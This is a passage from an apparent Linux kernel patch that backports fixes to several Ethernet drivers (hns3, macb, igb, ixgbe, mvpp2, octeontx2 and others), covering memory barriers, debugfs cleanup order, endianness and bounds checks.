+ 	eth_hw_addr_set(netdev, dev_addr);
+-	memset(mask, 0xFF, ETH_ALEN);
++	eth_broadcast_addr(mask);
+ 
+ 	mac_slot = (!port_priv->nr) ?  ADIN_MAC_P1_ADDR_SLOT : ADIN_MAC_P2_ADDR_SLOT;
+ 	port_rules = adin1110_port_rules(port_priv, true, false);
+@@ -1251,7 +1251,7 @@ static int adin1110_port_set_blocking_state(struct adin1110_port_priv *port_priv
+ 		goto out;
+ 
+ 	/* Allow only BPDUs to be passed to the CPU */
+-	memset(mask, 0xFF, ETH_ALEN);
++	eth_broadcast_addr(mask);
+ 	port_rules = adin1110_port_rules(port_priv, true, false);
+ 	ret = adin1110_write_mac_address(port_priv, mac_slot, mac,
+ 					 mask, port_rules);
+@@ -1365,8 +1365,8 @@ static int adin1110_fdb_add(struct adin1110_port_priv *port_priv,
+ 		return -ENOMEM;
+ 
+ 	other_port = priv->ports[!port_priv->nr];
+-	port_rules = adin1110_port_rules(port_priv, false, true);
+-	memset(mask, 0xFF, ETH_ALEN);
++	port_rules = adin1110_port_rules(other_port, false, true);
++	eth_broadcast_addr(mask);
+ 
+ 	return adin1110_write_mac_address(other_port, mac_nr, (u8 *)fdb->addr,
+ 					  mask, port_rules);
+diff --git a/drivers/net/ethernet/cadence/macb.h b/drivers/net/ethernet/cadence/macb.h
+index 9c410f93a1039..1aa578c1ca4ad 100644
+--- a/drivers/net/ethernet/cadence/macb.h
++++ b/drivers/net/ethernet/cadence/macb.h
+@@ -95,6 +95,8 @@
+ #define GEM_SA4B		0x00A0 /* Specific4 Bottom */
+ #define GEM_SA4T		0x00A4 /* Specific4 Top */
+ #define GEM_WOL			0x00b8 /* Wake on LAN */
++#define GEM_RXPTPUNI		0x00D4 /* PTP RX Unicast address */
++#define GEM_TXPTPUNI		0x00D8 /* PTP TX Unicast address */
+ #define GEM_EFTSH		0x00e8 /* PTP Event Frame Transmitted Seconds Register 47:32 */
+ #define GEM_EFRSH		0x00ec /* PTP Event Frame Received Seconds Register 47:32 */
+ #define GEM_PEFTSH		0x00f0 /* PTP Peer Event Frame Transmitted Seconds Register 47:32 */
+@@ -245,6 +247,8 @@
+ #define MACB_TZQ_OFFSET		12 /* Transmit zero quantum pause frame */
+ #define MACB_TZQ_SIZE		1
+ #define MACB_SRTSM_OFFSET	15 /* Store Receive Timestamp to Memory */
++#define MACB_PTPUNI_OFFSET	20 /* PTP Unicast packet enable */
++#define MACB_PTPUNI_SIZE	1
+ #define MACB_OSSMODE_OFFSET	24 /* Enable One Step Synchro Mode */
+ #define MACB_OSSMODE_SIZE	1
+ #define MACB_MIIONRGMII_OFFSET	28 /* MII Usage on RGMII Interface */
+diff --git a/drivers/net/ethernet/cadence/macb_main.c b/drivers/net/ethernet/cadence/macb_main.c
+index 5fb991835078a..54b032a46b48a 100644
+--- a/drivers/net/ethernet/cadence/macb_main.c
++++ b/drivers/net/ethernet/cadence/macb_main.c
+@@ -288,6 +288,11 @@ static void macb_set_hwaddr(struct macb *bp)
+ 	top = cpu_to_le16(*((u16 *)(bp->dev->dev_addr + 4)));
+ 	macb_or_gem_writel(bp, SA1T, top);
+ 
++	if (gem_has_ptp(bp)) {
++		gem_writel(bp, RXPTPUNI, bottom);
++		gem_writel(bp, TXPTPUNI, bottom);
++	}
++
+ 	/* Clear unused address register sets */
+ 	macb_or_gem_writel(bp, SA2B, 0);
+ 	macb_or_gem_writel(bp, SA2T, 0);
+@@ -700,8 +705,6 @@ static void macb_mac_link_up(struct phylink_config *config,
+ 		if (rx_pause)
+ 			ctrl |= MACB_BIT(PAE);
+ 
+-		macb_set_tx_clk(bp, speed);
+-
+ 		/* Initialize rings & buffers as clearing MACB_BIT(TE) in link down
+ 		 * cleared the pipeline and control registers.
+ 		 */
+@@ -721,8 +724,15 @@ static void macb_mac_link_up(struct phylink_config *config,
+ 
+ 	spin_unlock_irqrestore(&bp->lock, flags);
+ 
+-	/* Enable Rx and Tx */
+-	macb_writel(bp, NCR, macb_readl(bp, NCR) | MACB_BIT(RE) | MACB_BIT(TE));
++	if (!(bp->caps & MACB_CAPS_MACB_IS_EMAC))
++		macb_set_tx_clk(bp, speed);
++
++	/* Enable Rx and Tx; Enable PTP unicast */
++	ctrl = macb_readl(bp, NCR);
++	if (gem_has_ptp(bp))
++		ctrl |= MACB_BIT(PTPUNI);
++
++	macb_writel(bp, NCR, ctrl | MACB_BIT(RE) | MACB_BIT(TE));
+ 
+ 	netif_tx_wake_all_queues(ndev);
+ }
+diff --git a/drivers/net/ethernet/google/gve/gve_rx_dqo.c b/drivers/net/ethernet/google/gve/gve_rx_dqo.c
+index 2e6461b0ea8bc..a9409e3721ad7 100644
+--- a/drivers/net/ethernet/google/gve/gve_rx_dqo.c
++++ b/drivers/net/ethernet/google/gve/gve_rx_dqo.c
+@@ -492,7 +492,10 @@ static int gve_rx_append_frags(struct napi_struct *napi,
+ 		if (!skb)
+ 			return -1;
+ 
+-		skb_shinfo(rx->ctx.skb_tail)->frag_list = skb;
++		if (rx->ctx.skb_tail == rx->ctx.skb_head)
++			skb_shinfo(rx->ctx.skb_head)->frag_list = skb;
++		else
++			rx->ctx.skb_tail->next = skb;
+ 		rx->ctx.skb_tail = skb;
+ 		num_frags = 0;
+ 	}
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hnae3.h b/drivers/net/ethernet/hisilicon/hns3/hnae3.h
+index fcb8b6dc5ab92..c693bb701ba3e 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hnae3.h
++++ b/drivers/net/ethernet/hisilicon/hns3/hnae3.h
+@@ -797,6 +797,7 @@ struct hnae3_tc_info {
+ 	u8 max_tc; /* Total number of TCs */
+ 	u8 num_tc; /* Total number of enabled TCs */
+ 	bool mqprio_active;
++	bool dcb_ets_active;
+ };
+ 
+ #define HNAE3_MAX_DSCP			64
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c b/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c
+index 69d1549e63a98..00eed9835cb55 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c
+@@ -1406,9 +1406,9 @@ int hns3_dbg_init(struct hnae3_handle *handle)
+ 	return 0;
+ 
+ out:
+-	mutex_destroy(&handle->dbgfs_lock);
+ 	debugfs_remove_recursive(handle->hnae3_dbgfs);
+ 	handle->hnae3_dbgfs = NULL;
++	mutex_destroy(&handle->dbgfs_lock);
+ 	return ret;
+ }
+ 
+@@ -1416,6 +1416,9 @@ void hns3_dbg_uninit(struct hnae3_handle *handle)
+ {
+ 	u32 i;
+ 
++	debugfs_remove_recursive(handle->hnae3_dbgfs);
++	handle->hnae3_dbgfs = NULL;
++
+ 	for (i = 0; i < ARRAY_SIZE(hns3_dbg_cmd); i++)
+ 		if (handle->dbgfs_buf[i]) {
+ 			kvfree(handle->dbgfs_buf[i]);
+@@ -1423,8 +1426,6 @@ void hns3_dbg_uninit(struct hnae3_handle *handle)
+ 		}
+ 
+ 	mutex_destroy(&handle->dbgfs_lock);
+-	debugfs_remove_recursive(handle->hnae3_dbgfs);
+-	handle->hnae3_dbgfs = NULL;
+ }
+ 
+ void hns3_dbg_register_debugfs(const char *debugfs_dir_name)
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+index 61f833d61f583..8aae179554a81 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+@@ -2102,8 +2102,12 @@ static void hns3_tx_doorbell(struct hns3_enet_ring *ring, int num,
+ 	 */
+ 	if (test_bit(HNS3_NIC_STATE_TX_PUSH_ENABLE, &priv->state) && num &&
+ 	    !ring->pending_buf && num <= HNS3_MAX_PUSH_BD_NUM && doorbell) {
++		/* This smp_store_release() pairs with smp_load_aquire() in
++		 * hns3_nic_reclaim_desc(). Ensure that the BD valid bit
++		 * is updated.
++		 */
++		smp_store_release(&ring->last_to_use, ring->next_to_use);
+ 		hns3_tx_push_bd(ring, num);
+-		WRITE_ONCE(ring->last_to_use, ring->next_to_use);
+ 		return;
+ 	}
+ 
+@@ -2114,6 +2118,11 @@ static void hns3_tx_doorbell(struct hns3_enet_ring *ring, int num,
+ 		return;
+ 	}
+ 
++	/* This smp_store_release() pairs with smp_load_aquire() in
++	 * hns3_nic_reclaim_desc(). Ensure that the BD valid bit is updated.
++	 */
++	smp_store_release(&ring->last_to_use, ring->next_to_use);
++
+ 	if (ring->tqp->mem_base)
+ 		hns3_tx_mem_doorbell(ring);
+ 	else
+@@ -2121,7 +2130,6 @@ static void hns3_tx_doorbell(struct hns3_enet_ring *ring, int num,
+ 		       ring->tqp->io_base + HNS3_RING_TX_RING_TAIL_REG);
+ 
+ 	ring->pending_buf = 0;
+-	WRITE_ONCE(ring->last_to_use, ring->next_to_use);
+ }
+ 
+ static void hns3_tsyn(struct net_device *netdev, struct sk_buff *skb,
+@@ -3307,8 +3315,6 @@ static void hns3_set_default_feature(struct net_device *netdev)
+ 
+ 	netdev->priv_flags |= IFF_UNICAST_FLT;
+ 
+-	netdev->gso_partial_features |= NETIF_F_GSO_GRE_CSUM;
+-
+ 	netdev->features |= NETIF_F_HW_VLAN_CTAG_FILTER |
+ 		NETIF_F_HW_VLAN_CTAG_TX | NETIF_F_HW_VLAN_CTAG_RX |
+ 		NETIF_F_RXCSUM | NETIF_F_SG | NETIF_F_GSO |
+@@ -3562,9 +3568,8 @@ static void hns3_reuse_buffer(struct hns3_enet_ring *ring, int i)
+ static bool hns3_nic_reclaim_desc(struct hns3_enet_ring *ring,
+ 				  int *bytes, int *pkts, int budget)
+ {
+-	/* pair with ring->last_to_use update in hns3_tx_doorbell(),
+-	 * smp_store_release() is not used in hns3_tx_doorbell() because
+-	 * the doorbell operation already have the needed barrier operation.
++	/* This smp_load_acquire() pairs with smp_store_release() in
++	 * hns3_tx_doorbell().
+ 	 */
+ 	int ltu = smp_load_acquire(&ring->last_to_use);
+ 	int ntc = ring->next_to_clean;
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_ethtool.c b/drivers/net/ethernet/hisilicon/hns3/hns3_ethtool.c
+index cdf76fb58d45e..e22835ae8a941 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_ethtool.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_ethtool.c
+@@ -776,7 +776,9 @@ static int hns3_get_link_ksettings(struct net_device *netdev,
+ 		hns3_get_ksettings(h, cmd);
+ 		break;
+ 	case HNAE3_MEDIA_TYPE_FIBER:
+-		if (module_type == HNAE3_MODULE_TYPE_CR)
++		if (module_type == HNAE3_MODULE_TYPE_UNKNOWN)
++			cmd->base.port = PORT_OTHER;
++		else if (module_type == HNAE3_MODULE_TYPE_CR)
+ 			cmd->base.port = PORT_DA;
+ 		else
+ 			cmd->base.port = PORT_FIBRE;
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_dcb.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_dcb.c
+index 09362823140d5..2740f0d703e4f 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_dcb.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_dcb.c
+@@ -251,7 +251,7 @@ static int hclge_ieee_setets(struct hnae3_handle *h, struct ieee_ets *ets)
+ 	int ret;
+ 
+ 	if (!(hdev->dcbx_cap & DCB_CAP_DCBX_VER_IEEE) ||
+-	    hdev->flag & HCLGE_FLAG_MQPRIO_ENABLE)
++	    h->kinfo.tc_info.mqprio_active)
+ 		return -EINVAL;
+ 
+ 	ret = hclge_ets_validate(hdev, ets, &num_tc, &map_changed);
+@@ -267,10 +267,7 @@ static int hclge_ieee_setets(struct hnae3_handle *h, struct ieee_ets *ets)
+ 	}
+ 
+ 	hclge_tm_schd_info_update(hdev, num_tc);
+-	if (num_tc > 1)
+-		hdev->flag |= HCLGE_FLAG_DCB_ENABLE;
+-	else
+-		hdev->flag &= ~HCLGE_FLAG_DCB_ENABLE;
++	h->kinfo.tc_info.dcb_ets_active = num_tc > 1;
+ 
+ 	ret = hclge_ieee_ets_to_tm_info(hdev, ets);
+ 	if (ret)
+@@ -463,7 +460,7 @@ static u8 hclge_getdcbx(struct hnae3_handle *h)
+ 	struct hclge_vport *vport = hclge_get_vport(h);
+ 	struct hclge_dev *hdev = vport->back;
+ 
+-	if (hdev->flag & HCLGE_FLAG_MQPRIO_ENABLE)
++	if (h->kinfo.tc_info.mqprio_active)
+ 		return 0;
+ 
+ 	return hdev->dcbx_cap;
+@@ -587,7 +584,8 @@ static int hclge_setup_tc(struct hnae3_handle *h,
+ 	if (!test_bit(HCLGE_STATE_NIC_REGISTERED, &hdev->state))
+ 		return -EBUSY;
+ 
+-	if (hdev->flag & HCLGE_FLAG_DCB_ENABLE)
++	kinfo = &vport->nic.kinfo;
++	if (kinfo->tc_info.dcb_ets_active)
+ 		return -EINVAL;
+ 
+ 	ret = hclge_mqprio_qopt_check(hdev, mqprio_qopt);
+@@ -601,7 +599,6 @@ static int hclge_setup_tc(struct hnae3_handle *h,
+ 	if (ret)
+ 		return ret;
+ 
+-	kinfo = &vport->nic.kinfo;
+ 	memcpy(&old_tc_info, &kinfo->tc_info, sizeof(old_tc_info));
+ 	hclge_sync_mqprio_qopt(&kinfo->tc_info, mqprio_qopt);
+ 	kinfo->tc_info.mqprio_active = tc > 0;
+@@ -610,13 +607,6 @@ static int hclge_setup_tc(struct hnae3_handle *h,
+ 	if (ret)
+ 		goto err_out;
+ 
+-	hdev->flag &= ~HCLGE_FLAG_DCB_ENABLE;
+-
+-	if (tc > 1)
+-		hdev->flag |= HCLGE_FLAG_MQPRIO_ENABLE;
+-	else
+-		hdev->flag &= ~HCLGE_FLAG_MQPRIO_ENABLE;
+-
+ 	return hclge_notify_init_up(hdev);
+ 
+ err_out:
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c
+index 5cb8f1818e51c..a1c59f4aae988 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c
+@@ -1517,7 +1517,7 @@ static int hclge_dbg_fd_tcam_read(struct hclge_dev *hdev, bool sel_x,
+ 	struct hclge_desc desc[3];
+ 	int pos = 0;
+ 	int ret, i;
+-	u32 *req;
++	__le32 *req;
+ 
+ 	hclge_cmd_setup_basic_desc(&desc[0], HCLGE_OPC_FD_TCAM_OP, true);
+ 	desc[0].flag |= cpu_to_le16(HCLGE_COMM_CMD_FLAG_NEXT);
+@@ -1542,22 +1542,22 @@ static int hclge_dbg_fd_tcam_read(struct hclge_dev *hdev, bool sel_x,
+ 			 tcam_msg.loc);
+ 
+ 	/* tcam_data0 ~ tcam_data1 */
+-	req = (u32 *)req1->tcam_data;
++	req = (__le32 *)req1->tcam_data;
+ 	for (i = 0; i < 2; i++)
+ 		pos += scnprintf(tcam_buf + pos, HCLGE_DBG_TCAM_BUF_SIZE - pos,
+-				 "%08x\n", *req++);
++				 "%08x\n", le32_to_cpu(*req++));
+ 
+ 	/* tcam_data2 ~ tcam_data7 */
+-	req = (u32 *)req2->tcam_data;
++	req = (__le32 *)req2->tcam_data;
+ 	for (i = 0; i < 6; i++)
+ 		pos += scnprintf(tcam_buf + pos, HCLGE_DBG_TCAM_BUF_SIZE - pos,
+-				 "%08x\n", *req++);
++				 "%08x\n", le32_to_cpu(*req++));
+ 
+ 	/* tcam_data8 ~ tcam_data12 */
+-	req = (u32 *)req3->tcam_data;
++	req = (__le32 *)req3->tcam_data;
+ 	for (i = 0; i < 5; i++)
+ 		pos += scnprintf(tcam_buf + pos, HCLGE_DBG_TCAM_BUF_SIZE - pos,
+-				 "%08x\n", *req++);
++				 "%08x\n", le32_to_cpu(*req++));
+ 
+ 	return ret;
+ }
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+index 84ecd8b9be48c..884e45fb6b72e 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+@@ -11132,6 +11132,7 @@ static void hclge_get_mdix_mode(struct hnae3_handle *handle,
+ 
+ static void hclge_info_show(struct hclge_dev *hdev)
+ {
++	struct hnae3_handle *handle = &hdev->vport->nic;
+ 	struct device *dev = &hdev->pdev->dev;
+ 
+ 	dev_info(dev, "PF info begin:\n");
+@@ -11148,9 +11149,9 @@ static void hclge_info_show(struct hclge_dev *hdev)
+ 	dev_info(dev, "This is %s PF\n",
+ 		 hdev->flag & HCLGE_FLAG_MAIN ? "main" : "not main");
+ 	dev_info(dev, "DCB %s\n",
+-		 hdev->flag & HCLGE_FLAG_DCB_ENABLE ? "enable" : "disable");
++		 handle->kinfo.tc_info.dcb_ets_active ? "enable" : "disable");
+ 	dev_info(dev, "MQPRIO %s\n",
+-		 hdev->flag & HCLGE_FLAG_MQPRIO_ENABLE ? "enable" : "disable");
++		 handle->kinfo.tc_info.mqprio_active ? "enable" : "disable");
+ 	dev_info(dev, "Default tx spare buffer size: %u\n",
+ 		 hdev->tx_spare_buf_size);
+ 
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.h b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.h
+index 13f23d606e77b..f6fef790e16c1 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.h
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.h
+@@ -916,8 +916,6 @@ struct hclge_dev {
+ 
+ #define HCLGE_FLAG_MAIN			BIT(0)
+ #define HCLGE_FLAG_DCB_CAPABLE		BIT(1)
+-#define HCLGE_FLAG_DCB_ENABLE		BIT(2)
+-#define HCLGE_FLAG_MQPRIO_ENABLE	BIT(3)
+ 	u32 flag;
+ 
+ 	u32 pkt_buf_size; /* Total pf buf size for tx/rx */
+diff --git a/drivers/net/ethernet/intel/igb/igb.h b/drivers/net/ethernet/intel/igb/igb.h
+index 015b781441149..a2b759531cb7b 100644
+--- a/drivers/net/ethernet/intel/igb/igb.h
++++ b/drivers/net/ethernet/intel/igb/igb.h
+@@ -34,11 +34,11 @@ struct igb_adapter;
+ /* TX/RX descriptor defines */
+ #define IGB_DEFAULT_TXD		256
+ #define IGB_DEFAULT_TX_WORK	128
+-#define IGB_MIN_TXD		80
++#define IGB_MIN_TXD		64
+ #define IGB_MAX_TXD		4096
+ 
+ #define IGB_DEFAULT_RXD		256
+-#define IGB_MIN_RXD		80
++#define IGB_MIN_RXD		64
+ #define IGB_MAX_RXD		4096
+ 
+ #define IGB_DEFAULT_ITR		3 /* dynamic */
+diff --git a/drivers/net/ethernet/intel/igb/igb_main.c b/drivers/net/ethernet/intel/igb/igb_main.c
+index d0ead18ec0266..45ce4ed16146e 100644
+--- a/drivers/net/ethernet/intel/igb/igb_main.c
++++ b/drivers/net/ethernet/intel/igb/igb_main.c
+@@ -3877,8 +3877,9 @@ static void igb_probe_vfs(struct igb_adapter *adapter)
+ 	struct pci_dev *pdev = adapter->pdev;
+ 	struct e1000_hw *hw = &adapter->hw;
+ 
+-	/* Virtualization features not supported on i210 family. */
+-	if ((hw->mac.type == e1000_i210) || (hw->mac.type == e1000_i211))
++	/* Virtualization features not supported on i210 and 82580 family. */
++	if ((hw->mac.type == e1000_i210) || (hw->mac.type == e1000_i211) ||
++	    (hw->mac.type == e1000_82580))
+ 		return;
+ 
+ 	/* Of the below we really only want the effect of getting
+diff --git a/drivers/net/ethernet/intel/igbvf/igbvf.h b/drivers/net/ethernet/intel/igbvf/igbvf.h
+index 57d39ee00b585..7b83678ba83a6 100644
+--- a/drivers/net/ethernet/intel/igbvf/igbvf.h
++++ b/drivers/net/ethernet/intel/igbvf/igbvf.h
+@@ -39,11 +39,11 @@ enum latency_range {
+ /* Tx/Rx descriptor defines */
+ #define IGBVF_DEFAULT_TXD	256
+ #define IGBVF_MAX_TXD		4096
+-#define IGBVF_MIN_TXD		80
++#define IGBVF_MIN_TXD		64
+ 
+ #define IGBVF_DEFAULT_RXD	256
+ #define IGBVF_MAX_RXD		4096
+-#define IGBVF_MIN_RXD		80
++#define IGBVF_MIN_RXD		64
+ 
+ #define IGBVF_MIN_ITR_USECS	10 /* 100000 irq/sec */
+ #define IGBVF_MAX_ITR_USECS	10000 /* 100    irq/sec */
+diff --git a/drivers/net/ethernet/intel/igc/igc.h b/drivers/net/ethernet/intel/igc/igc.h
+index f83cbc4a1afa8..d3b17aa1d1a83 100644
+--- a/drivers/net/ethernet/intel/igc/igc.h
++++ b/drivers/net/ethernet/intel/igc/igc.h
+@@ -354,11 +354,11 @@ static inline u32 igc_rss_type(const union igc_adv_rx_desc *rx_desc)
+ /* TX/RX descriptor defines */
+ #define IGC_DEFAULT_TXD		256
+ #define IGC_DEFAULT_TX_WORK	128
+-#define IGC_MIN_TXD		80
++#define IGC_MIN_TXD		64
+ #define IGC_MAX_TXD		4096
+ 
+ #define IGC_DEFAULT_RXD		256
+-#define IGC_MIN_RXD		80
++#define IGC_MIN_RXD		64
+ #define IGC_MAX_RXD		4096
+ 
+ /* Supported Rx Buffer Sizes */
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_ptp.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_ptp.c
+index f8605f57bd067..75e1383263c1e 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_ptp.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_ptp.c
+@@ -995,6 +995,7 @@ static int ixgbe_ptp_set_timestamp_mode(struct ixgbe_adapter *adapter,
+ 	u32 tsync_tx_ctl = IXGBE_TSYNCTXCTL_ENABLED;
+ 	u32 tsync_rx_ctl = IXGBE_TSYNCRXCTL_ENABLED;
+ 	u32 tsync_rx_mtrl = PTP_EV_PORT << 16;
++	u32 aflags = adapter->flags;
+ 	bool is_l2 = false;
+ 	u32 regval;
+ 
+@@ -1012,20 +1013,20 @@ static int ixgbe_ptp_set_timestamp_mode(struct ixgbe_adapter *adapter,
+ 	case HWTSTAMP_FILTER_NONE:
+ 		tsync_rx_ctl = 0;
+ 		tsync_rx_mtrl = 0;
+-		adapter->flags &= ~(IXGBE_FLAG_RX_HWTSTAMP_ENABLED |
+-				    IXGBE_FLAG_RX_HWTSTAMP_IN_REGISTER);
++		aflags &= ~(IXGBE_FLAG_RX_HWTSTAMP_ENABLED |
++			    IXGBE_FLAG_RX_HWTSTAMP_IN_REGISTER);
+ 		break;
+ 	case HWTSTAMP_FILTER_PTP_V1_L4_SYNC:
+ 		tsync_rx_ctl |= IXGBE_TSYNCRXCTL_TYPE_L4_V1;
+ 		tsync_rx_mtrl |= IXGBE_RXMTRL_V1_SYNC_MSG;
+-		adapter->flags |= (IXGBE_FLAG_RX_HWTSTAMP_ENABLED |
+-				   IXGBE_FLAG_RX_HWTSTAMP_IN_REGISTER);
++		aflags |= (IXGBE_FLAG_RX_HWTSTAMP_ENABLED |
++			   IXGBE_FLAG_RX_HWTSTAMP_IN_REGISTER);
+ 		break;
+ 	case HWTSTAMP_FILTER_PTP_V1_L4_DELAY_REQ:
+ 		tsync_rx_ctl |= IXGBE_TSYNCRXCTL_TYPE_L4_V1;
+ 		tsync_rx_mtrl |= IXGBE_RXMTRL_V1_DELAY_REQ_MSG;
+-		adapter->flags |= (IXGBE_FLAG_RX_HWTSTAMP_ENABLED |
+-				   IXGBE_FLAG_RX_HWTSTAMP_IN_REGISTER);
++		aflags |= (IXGBE_FLAG_RX_HWTSTAMP_ENABLED |
++			   IXGBE_FLAG_RX_HWTSTAMP_IN_REGISTER);
+ 		break;
+ 	case HWTSTAMP_FILTER_PTP_V2_EVENT:
+ 	case HWTSTAMP_FILTER_PTP_V2_L2_EVENT:
+@@ -1039,8 +1040,8 @@ static int ixgbe_ptp_set_timestamp_mode(struct ixgbe_adapter *adapter,
+ 		tsync_rx_ctl |= IXGBE_TSYNCRXCTL_TYPE_EVENT_V2;
+ 		is_l2 = true;
+ 		config->rx_filter = HWTSTAMP_FILTER_PTP_V2_EVENT;
+-		adapter->flags |= (IXGBE_FLAG_RX_HWTSTAMP_ENABLED |
+-				   IXGBE_FLAG_RX_HWTSTAMP_IN_REGISTER);
++		aflags |= (IXGBE_FLAG_RX_HWTSTAMP_ENABLED |
++			   IXGBE_FLAG_RX_HWTSTAMP_IN_REGISTER);
+ 		break;
+ 	case HWTSTAMP_FILTER_PTP_V1_L4_EVENT:
+ 	case HWTSTAMP_FILTER_NTP_ALL:
+@@ -1051,7 +1052,7 @@ static int ixgbe_ptp_set_timestamp_mode(struct ixgbe_adapter *adapter,
+ 		if (hw->mac.type >= ixgbe_mac_X550) {
+ 			tsync_rx_ctl |= IXGBE_TSYNCRXCTL_TYPE_ALL;
+ 			config->rx_filter = HWTSTAMP_FILTER_ALL;
+-			adapter->flags |= IXGBE_FLAG_RX_HWTSTAMP_ENABLED;
++			aflags |= IXGBE_FLAG_RX_HWTSTAMP_ENABLED;
+ 			break;
+ 		}
+ 		fallthrough;
+@@ -1062,8 +1063,6 @@ static int ixgbe_ptp_set_timestamp_mode(struct ixgbe_adapter *adapter,
+ 		 * Delay_Req messages and hardware does not support
+ 		 * timestamping all packets => return error
+ 		 */
+-		adapter->flags &= ~(IXGBE_FLAG_RX_HWTSTAMP_ENABLED |
+-				    IXGBE_FLAG_RX_HWTSTAMP_IN_REGISTER);
+ 		config->rx_filter = HWTSTAMP_FILTER_NONE;
+ 		return -ERANGE;
+ 	}
+@@ -1095,8 +1094,8 @@ static int ixgbe_ptp_set_timestamp_mode(struct ixgbe_adapter *adapter,
+ 			       IXGBE_TSYNCRXCTL_TYPE_ALL |
+ 			       IXGBE_TSYNCRXCTL_TSIP_UT_EN;
+ 		config->rx_filter = HWTSTAMP_FILTER_ALL;
+-		adapter->flags |= IXGBE_FLAG_RX_HWTSTAMP_ENABLED;
+-		adapter->flags &= ~IXGBE_FLAG_RX_HWTSTAMP_IN_REGISTER;
++		aflags |= IXGBE_FLAG_RX_HWTSTAMP_ENABLED;
++		aflags &= ~IXGBE_FLAG_RX_HWTSTAMP_IN_REGISTER;
+ 		is_l2 = true;
+ 		break;
+ 	default:
+@@ -1129,6 +1128,9 @@ static int ixgbe_ptp_set_timestamp_mode(struct ixgbe_adapter *adapter,
+ 
+ 	IXGBE_WRITE_FLUSH(hw);
+ 
++	/* configure adapter flags only when HW is actually configured */
++	adapter->flags = aflags;
++
+ 	/* clear TX/RX time stamp registers, just to be sure */
+ 	ixgbe_ptp_clear_tx_timestamp(adapter);
+ 	IXGBE_READ_REG(hw, IXGBE_RXSTMPH);
+diff --git a/drivers/net/ethernet/marvell/mvpp2/mvpp2_main.c b/drivers/net/ethernet/marvell/mvpp2/mvpp2_main.c
+index b399bdb1ca362..f936640cca4e6 100644
+--- a/drivers/net/ethernet/marvell/mvpp2/mvpp2_main.c
++++ b/drivers/net/ethernet/marvell/mvpp2/mvpp2_main.c
+@@ -5578,6 +5578,11 @@ static int mvpp2_ethtool_get_rxnfc(struct net_device *dev,
+ 		break;
+ 	case ETHTOOL_GRXCLSRLALL:
+ 		for (i = 0; i < MVPP2_N_RFS_ENTRIES_PER_FLOW; i++) {
++			if (loc == info->rule_cnt) {
++				ret = -EMSGSIZE;
++				break;
++			}
++
+ 			if (port->rfs_rules[i])
+ 				rules[loc++] = i;
+ 		}
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+index c85e0180d96da..1f3a8cf42765e 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+@@ -834,6 +834,21 @@ static int nix_aq_enqueue_wait(struct rvu *rvu, struct rvu_block *block,
+ 	return 0;
+ }
+ 
++static void nix_get_aq_req_smq(struct rvu *rvu, struct nix_aq_enq_req *req,
++			       u16 *smq, u16 *smq_mask)
++{
++	struct nix_cn10k_aq_enq_req *aq_req;
++
++	if (!is_rvu_otx2(rvu)) {
++		aq_req = (struct nix_cn10k_aq_enq_req *)req;
++		*smq = aq_req->sq.smq;
++		*smq_mask = aq_req->sq_mask.smq;
++	} else {
++		*smq = req->sq.smq;
++		*smq_mask = req->sq_mask.smq;
++	}
++}
++
+ static int rvu_nix_blk_aq_enq_inst(struct rvu *rvu, struct nix_hw *nix_hw,
+ 				   struct nix_aq_enq_req *req,
+ 				   struct nix_aq_enq_rsp *rsp)
+@@ -845,6 +860,7 @@ static int rvu_nix_blk_aq_enq_inst(struct rvu *rvu, struct nix_hw *nix_hw,
+ 	struct rvu_block *block;
+ 	struct admin_queue *aq;
+ 	struct rvu_pfvf *pfvf;
++	u16 smq, smq_mask;
+ 	void *ctx, *mask;
+ 	bool ena;
+ 	u64 cfg;
+@@ -916,13 +932,14 @@ static int rvu_nix_blk_aq_enq_inst(struct rvu *rvu, struct nix_hw *nix_hw,
+ 	if (rc)
+ 		return rc;
+ 
++	nix_get_aq_req_smq(rvu, req, &smq, &smq_mask);
+ 	/* Check if SQ pointed SMQ belongs to this PF/VF or not */
+ 	if (req->ctype == NIX_AQ_CTYPE_SQ &&
+ 	    ((req->op == NIX_AQ_INSTOP_INIT && req->sq.ena) ||
